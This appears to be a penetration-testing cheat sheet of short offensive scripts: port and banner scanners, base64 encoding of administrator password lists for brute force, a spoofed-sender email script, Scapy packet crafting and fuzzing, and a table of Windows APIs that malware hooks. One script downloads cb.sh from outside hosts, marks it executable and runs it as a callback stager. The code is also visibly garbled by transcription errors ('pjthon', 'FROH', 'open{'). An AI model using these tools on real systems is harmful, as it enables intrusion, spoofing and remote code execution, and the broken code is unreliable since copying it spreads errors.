Comment on page
Programming
import socket as sk
for port in range (1, 1024):
try:
s=sk. socket (sk. AF _ INET, sk. SOCK_ STREAM)
s.settimeout(1000)
s. connect ( (' 127. 0. 0. 1 ' , port) )
print '%d:OPEN' % (port)
s.close
except: continue
#!/usr/bin/pjthon
import base64
filel=open("pwd.lst","r")
file2=open("b64pwds.lst","w")
for line in file1:
clear= "administrator:"+ str.strip(line)
new= base64.encodestring(clear)
file2.write(new)
import binascii, sys, string
dataFormatHex = binascii.a2b_hex(sys.argv[1])
output = ""
for char in dataFormatEx:
if char in string.printable: output += char
else: output += "."
print ''\n'' + output
import glob, re
for msg in glob.glob('/tmp/.txt'):
filer = open((msg), 'r')
data = file.read()
message= re.findall(r' message (.'?) /message ', data, re.DOTALL)
print "File %s contains %s" % (str(msg), message)
fi1er.c1ose()
# Create SSL cert (follow prompts for customization)
openssl req -new -x509 -keyout cert.pem -out cert.pern -days 365 -nodes
#Create httpserver.pj
import BaseHTTPServer, SimpleHTTPServer, ssl
cert="cert.pem"
httpd = BaseHTTPServer.HTTPServer( ('192.168.1.10' ,443),
Simp1eHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap socket(httpd.socket,certflle=cert,server side=True)
httpd.serve_forever()
python -m SimpleHTTPServer 8080
#!/usr/bin/python
import smtplib, string
import os, time
os.system("/etc/init.d/sendmail start")
time.sleep(4)
HOST = "localhost"
SUBJECT = "Email from spoofed sender"
TO = "[email protected]"
FROM= "[email protected]"
TEXT = "Message Body"
BODY = string.join( (
"From: %s" % FROH,
"To: %s" % TO,
"Subject: %s" % SUBJECT ,
"",
TEXT
) , "\r\n")
server = smtplib.SMTP(HOST)
server.sendmail(FROM, [TO], BODY)
server. quit ()
time.sleep(4)
os.system("/etc/init.d/sendmail stop")
#!/usr/bin/python
import urllib2, os
urls = [ "1 1.1.1.1","2.2.2.2"]
port = "80"
payload = "cb.sh"
for url in urls:
u = "http://%s:%s/%s" % (url, port, payload)
try:
r = urllib2.urlopen(u)
wfile = open{"/tmp/cb.sh", "wb")
wfile.write(r.read())
wfile. close ()
break
except: continue
if os.path.exists("/tmp/cb.sh"):
os.system("chmod 700 /tmp/cb.sh")
os. system ( "/tmp/cb. sh")
#!/usr/bin/python
import urllib2, sys, time
from optparse import OptionParser
parser = OptionParser()
parser.add option{''-t'', dest=''iprange'', help=''target IP range, i.e.
192.168.1.1-25")
parser.add option(''-p'', dest=''port'',default=''80'',help=''port, default=BO'')
parser.add=option("-d", dest="delay",default=".5",help="delay (in seconds),
default=.5 seconds")
(opts, args) = parser.parse_args()
if opts.iprange is None:
parser.error("you must supply an IP range")
ips = []
headers={}
octets= opts.iprange.split(' .')
start= octets[3] .split('-') [0]
stop = octets [3]. split ( '-' ) [ 1 ]
for i in range(int(start),int(stop)+1):
ips.append('%s.%s.%s.%d' % (octets[O],octets[1] ,octets[2],i))
print '\nScanning IPs: %s\n' % (ips)
for ip in ips:
try:
response= urllib2.urlopen('http://%s:%s' % (ip,opts.port))
headers[ip] = dict(response.info())
except Exception as e:
headers[ip] = "Error: " + str(e)
time.sleep(float(opts.delay))
for header in headers:
try:
print '%s : %s' % (header,headers[header] .get('server'))
except:
print '%s : %s' % (header,headers[header])
When you craft TCP packets with Scapy, the underlying OS will not recognize the initial SYN packet and will reply with a RST packet. To mitigate this you need to set the following Iptables rule: iptables -A OUTPUT -p tcp –tcp-flags RST RST -j DROP
phrase | Explanation |
from scapy.all import * | Loading all scapy libraries |
ls () | List of all protocols |
lsc () | list of all functions |
conf | Display and settings |
IP(src=RandiP()) | Generate random destination IP |
Ether(src=RandMAC() I | Generate random destination MAC |
ip=IP(src=”1.1.1.1”,dst=”2.2.2.2”) | Change the ip parameter |
tcp=TCP(dport=”443”) | Change the tcp parameter |
data= “TCP data” | specify the data part |
packet=ip/tcp/data | Create ip and tcp package |
packet.show() | Show package settings |
send(packet,count=1) | send 1 packet to layer 3 |
sendp(packet,count=2) | Send 2 packets to layer 3 |
sendpfast(packet) | Send faster with tcpreply |
sr(packet) | Send 1 package and get the result |
sr1(packet) | Post only one reply |
for i in range(0,1000): send (packet·) | Send a set a thousand times |
sniff(count=100,iface=eth0) | Listen for hundred packets on eth0 |
sr ( IPv6 ( src=" ipv6 ", dst="ipv6")/ ICMP ())
ip=IP(src="ip", dst="ip")
u=UDP(dport=1234, sport=5678)
pay = "my UDP packet"
packet=ip/u/pay
packet.show()
wrpcap ("out.pcap",packet):write to pcap
send(packet)
packet=IP(src="ip" ,dst="ip")/UDP(dport=l23)/fuzz(NTP(version=4,mode=4))
from scapy.all import *
# Add iptables rule to block attack box from sending RSTs
# Create web.txt with entire GET/POST packet data
fileweb = open("web.txt",'r')
data = fileweb.read()
ip = IP(dst="ip")
SYN=ip/TCP(rport=RandNum(6000,7000),dport=BO,flags="S",seq=4)
SYNACK = sr1(SYN)
ACK=ip/TCP(sport=SYNACK.dport,dport=BO,flags="A",seq=SYNACK.ack,ack=SYNACK.
seq+l)/data
reply, error = sr(ACK)
print reply.show()
use strictly; use IO::Socket;
for($port=0;$port 65535;$port++) {
$remote=IO::Socket::INET-new(
Proto= "tcp",PeerAddr= "127.0.0.1",PeerPort= $port);
if($remote) {print "$port is open\n"); )
Law | Explanation |
^ start | |
* Zero or more | |
+ one or more | |
? | Zero or one |
. | All characters up to |
{3} Exactly three | |
{3,} | Three or more |
{3,5} | Three or four or five |
{3|5} | Three or five |
[345] | Three or four or five |
[ ^34] | Apart from three or four |
[a-z] | letters a-z |
[A-Z] | Letters A-Z |
[0-9] | Digits 0-9 |
\d | Digits |
\D | Except for the digit |
\w | All A-Z, a-z, 0-9 |
\W | Except A-Z,a-z,0-9 |
\s | Empty space (\t\r\n\f) |
\S | Except (\t\r\n\f) |
reg[ex] | “rege” or “regx” |
regex? | '’rege’’ or ‘‘regex’’ |
regex* | ``rege’’ w/ 0 or more x |
regex+ | ``rege’’ w/ 1 or more x |
[Rr]egex | '’Regex’’ or ‘‘regex’’ |
\d{3} | Exactly three digits |
\d{ 3,) | Three or more digits |
[aeiou] | Each one |
(0 [3-9] |1 [0-9]|2 [0-5]) | Range 03 to 25 |
#!/bin/bash
RESULT=0
while [ $RESULT -eq 0 ]
do
PASSWORD="PASSWORD"
ZIPFILE="$( ls *.zip )"
unzip -P "$PASSWORD" "$ZIPFILE"
RESULT=$?
echo "Unzipped $ZIPFILE using password $PASSWORD ($RESULT)"
cd flag
done
API | Description |
CreateProcess | This API function is used to start a new process. By hooking this function, malware can intercept calls to create new processes and inject its code into them, allowing it to execute in the context of the newly created process. |
LoadLibrary/LoadLibraryEx | These functions are used to load dynamic link libraries (DLLs) into a process’s address space. By hooking these functions, malware can inject its code into a target process by loading a malicious DLL. |
RegOpenKeyEx/RegCreateKeyEx | These functions are used to access and create registry keys. By hooking these functions, malware can monitor and modify the registry, which can be used to maintain persistence or evade detection. |
NtCreateFile/NtOpenFile | These functions are used to create or open files on disk. By hooking these functions, malware can intercept calls to access sensitive files, such as password files or system configuration files. |
SendMessage | This function is used to send a message to a window or control in a user interface. By hooking this function, malware can monitor and modify user input, which can be used to steal sensitive information such as login credentials or credit card numbers. |
CreateFile | this API is used to create or open a file, and is often hooked to allow malware to hide its own files or open and modify existing files. |
RegOpenKeyEx | this API is used to open a registry key, and is often hooked to allow malware to modify or delete registry keys, which can be used for persistence or to disable security software. |
InternetConnect | this API is used to connect to a remote server over the internet, and is often hooked to allow malware to communicate with a command and control server. |
LoadLibrary | this API is used to load a dynamic link library (DLL) into memory, and is often hooked to allow malware to load its own DLLs or to hijack legitimate DLLs. |
SetWindowsHookEx | this API is used to install a hook procedure for a specific system-wide event, such as a keystroke or mouse click, and is often hooked to allow malware to monitor user activity or to inject code into other processes. |
CreateFile | used to create or open a file or device object. Hooking this API can allow malware to intercept attempts to access certain files or devices, and potentially modify or redirect those requests. |
SetWindowsHookEx | used to set a system-wide or thread-specific hook procedure for certain types of events, such as mouse or keyboard input. Hooking this API can allow malware to monitor or manipulate user input or system behavior. |
InternetConnect | used to establish a connection to an FTP, HTTP, or HTTPS server. Hooking this API can allow malware to intercept or modify network traffic, potentially allowing it to steal sensitive information or carry out other malicious actions. |
CreateProcessA/W | used to create a new process. Malware can hook this API to inject code into a legitimate process or to hide its presence by running as a child process of a legitimate application. |
RegCreateKeyExA/W | used to create a new registry key. Malware can hook this API to create persistence by creating a new registry key that will ensure the malware runs every time the system is started. |
GetProcAddress | used to retrieve the address of a function in a DLL module. Malware can hook this API to hide its presence by preventing security software from detecting the functions it is using. |
InternetConnectA/W | used to connect to an FTP, HTTP, or HTTPS server. Malware can hook this API to steal sensitive data such as passwords and login credentials. |
NtQuerySystemInformation | used to retrieve system information such as running processes and drivers. Malware can hook this API to hide its presence by preventing security software from detecting its processes and drivers. |
NtQuerySystemInformation | this API is commonly hooked by malware to hide its processes and drivers, making it more difficult for security software to detect its presence on the system. |
Last modified 1mo ago